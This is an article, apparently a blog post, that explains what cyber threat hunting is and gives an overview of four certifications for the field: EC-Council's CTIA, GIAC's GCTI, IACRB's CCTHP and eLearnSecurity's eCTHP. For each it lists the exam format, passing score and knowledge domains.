Heard of cyber threat hunting but not sure exactly what it is and why it is important? Perhaps one of the most cutting edge areas within information security right now. Lets talk about what cyber threat hunting is and take a look at what we think are the best certifications to propel your career in this area.
Cyber threat hunting is a practice of finding and neutralizing cyber threats before they could evade traditional security solutions. Unlike penetration testing, cyber threat hunting is performed in real-time and real-environment. Ideal threat hunting requires in-depth knowledge of the working environment and skills to interpret the changes that take place. Threat hunters carefully analyze the environment, looking for any suspicious activities or malicious behaviors. This can be done by adopting different approaches, such as 1) Hypothesis-based approach, 2) Known-Indicators approach, and 3) Machine learning approach. The success of threat hunting highly depends on threat hunter’s knowledge and skills. A good threat hunter knows how to use different threat hunting approaches and data acquisition methodologies to perform data analysis. Data monitoring is usually achieved through different monitoring tools like firewalls, Intrusion Detection Systems (IDSs), Data Loss Protection (DLP) tools, logs, etc. Different SIEM (Security Information and Event Management) and analytics tools are used to collect and analyze the data. An experienced threat hunter knows how to use these tools (solutions) and data analysis solutions. Different certification bodies and organizations offer cyber threat hunting certifications to certify threat hunting knowledge and expertise of professionals. Following is a brief overview of most popular cyber threat hunting certifications that are highly acknowledged by organizations looking for expert cyber threat hunters.
1) Certified Threat Intelligence Analyst (CTIA)
CTIA is a 3-days training and certification program offered by EC-Council. The content of CTIA is designed with the help of the world’s prominent threat intelligence experts. CTIA validates individuals’ capabilities of designing proactive and iterable intelligence programs that can help organizations in gathering evidence-based knowledge to take actions against known and unknown cyber-threats. CTIA holders can enhance the organizations’ predictive capabilities along with proactive measures against unknown cyber-threats.
CTIA is an advanced level certification that requires a good understanding of the cyber-security domain. The certification is specifically designed for the following experienced cyber-security professionals.
- Ethical hackers
- Threat intelligence analysts
- Threat hunters
- Digital forensic experts
- SOC professionals
- Information security experts
- Security architects
- Security managers
CTIA Exam Format
CTIA exam is designed on the following pattern.
Exam Availability: EC-Council Portal
Total Questions: 50
Exam Format: Multiple Choice Questions
Exam Duration: 2 Hours
Passing Score: 70%
The candidates interested in CTIA must have two years of working experience in the Information security domain. Official CTIA training is also mandatory before taking CTIA exam.
CTIA Knowledge Domains
The following six domains are covered in the current (v1) CTIA exam format.
1) Introduction to Threat Intelligence: The weightage of Introduction to Threat Intelligence domain in CTIA exam is 14%. The important topics (subdomains) covered in this domain are:
- Understanding threat intelligence
- Threat intelligence lifecycle overview
- Threat intelligence frameworks overview
2) Cyber Threats and Kill Chain Methodologies: Cyber Threats and Kill Chain Methodologies contribute 14% in CTIA exam. The domain comprises of the following subdomains.
- Cyber threats
- Advanced persistent threats
- Cyber kill chain
- Indicators of compromise
3) Requirements, Direction, Planning, and Overview: 16% of the questions in CTIA exam are taken from this domain. The domain covers the following:
- Understanding current landscape
- Understanding requirements
- Planning threat intelligence program
- Establishing support
- Building team
- Reviewing threat intelligence program
4) Data Collection and Processing: This domain has the highest exam weightage of 24%. The important sub-domains of Data Collection and Processing are:
- Threat intelligence data collection overview
- Understanding data collection and acquisition
- Understanding data processing and exploitation
5) Data Analysis: Data Analysis is the fifth domain covered in CTIA exam. The domain contributes 18% to CTIA exam from the following sub-domains.
- Data analysis overview
- Threat analysis overview
- Data analysis techniques
- Threat intelligence tools overview
6) Dissemination and Reporting of Intelligence: It is the 6th domain included in CTIA exam. The domain contributes 14% with the following sub-domains.
- Understanding dissemination
- Threat intelligence reports overview
- Threat intelligence sharing overview
- Delivery mechanisms overview
- Threat intelligence integration
- Intelligence sharing regulations and acts
CTIA reference Page: https://www.eccouncil.org/programs/certified-threat-intelligence-analyst-ctia/
2) GIAC Cyber Threat Intelligence (GCTI)
GCTI certification not only covers the basics of Cyber threat intelligence but also focuses on strategic and operational expertise of threat hunters. GCTI certified professionals are considered experts in open source intelligence (applications and strategies), information gathering, and data analysis.
The following security professionals are encouraged to avail GCTI certification.
- Threat hunters
- Incident response teams
- SOC members
- Digital forensic experts
- Information security professionals
GCTI Exam Format
GCTI is a Pearson VUE proctored exam that must be scheduled online before taking the exam. The current exam has the following format.
Exam Type: Proctored
Total Exam Questions: 75
Allotted Time: 2 Hours
Passing Score: 71%
GCTI Knowledge Domains
Individuals interested in GCTI certification must prepare for the following exam topics. GIAC training is also available to help people understand the following topics in detail.
- Intelligence Analysis
- Intelligence Basics
- Intelligence Applications Knowledge
- Attribution and Campaigns
- Data Collection and Storage
- Kill chain
- Diamond model
- Malware analysis tools and techniques
- Intelligence sharing
GCTI reference page: https://www.giac.org/certification/cyber-threat-intelligence-gcti
3) Certified Cyber Threat Hunting Professional (CCTHP)
CCTHP is owned by Information Assurance Certification Review Board (IACRB). IACRB is a not-for-profit legal entity that offers a number of Information Assurance (IA) certifications. CCTHP offered by IACRB certifies the identification and cyber threat hunting knowledge and skills of professionals.
CCTHP earns a high reputation among organizations and IT industries. People interested in threat hunting career can go for CCTHP certification to present the credential as proof of cyber threat knowledge and hunting capabilities.
CCTHP Exam Format
CCTHP has the following exam format. The exam can be scheduled at any IACRB’s partners location, over the internet for employees of approved organizations, or proctored on-site at the desired location for a group of (10 or more) candidates.
Total Exam Questions: 50
Questions Format: Multiple Choice Questions
Exam Duration: 2 Hours
Passing Marks: 70%
CCTHP Knowledge Domains
Candidates interested in CCTHP exam must have expertise in the following five domains (approved by CCTHP body of knowledge).
- Cyber threat hunting – definitions and goals
- Methodologies and techniques used in cyber threat hunting
- Technologies and tools used in cyber threat hunting
- Network-based cyber threats hunting
- Host-based cyber threat hunting
CCTHP certification is valid for a period of 4 years. CCTHP holders are required to retake the then available CCTHP exam to recertify them. There are no extra fees charged for recertification.
CCTHP reference page: http://www.iacertification.org/ccthp_certified_cyber_threat_hunting_professional.html
4) eLearnSecurity’s Certified Threat Hunting Professional (eCTHP)
eLearnSecurity is a project of Caendra Inc., a Silicon Valley-based company that deals in IT security training and certification programs. eLearnSecurity evaluates threat hunting skills as well as defense strategies of professionals.
- Cyber threat hunters
- Information security practitioners
- Security Operations Center (SOC) specialists
- IT security professionals
eCTHP Exam Format
eCTHP exam format is totally different from the aforementioned exam formats. eLearnSecurity evaluates professionals through practical exams via virtual labs. The candidates are required to perform threat hunting in a corporate network designed solely to test the threat hunting skills and defense strategies of examinees. A reliable internet connection and VPN is required to take eCTHP exam from the comfort of home or office. eLearnSecurity also offers related training before taking the exam.
eCTHP Knowledge Domains
eLearnSecurity assesses candidates threat hunting skills in the following areas.
- Network traffic analysis
- Data correlation
- Knowledge of data analysis tools
- Data enrichment
- Forensics of Memory locations
- Windows and Linux event analysis
- Log analysis
- IOC-based threat hunting
- Cyber Kill Chain
eCTHP reference page: https://www.elearnsecurity.com/certification/ecthp/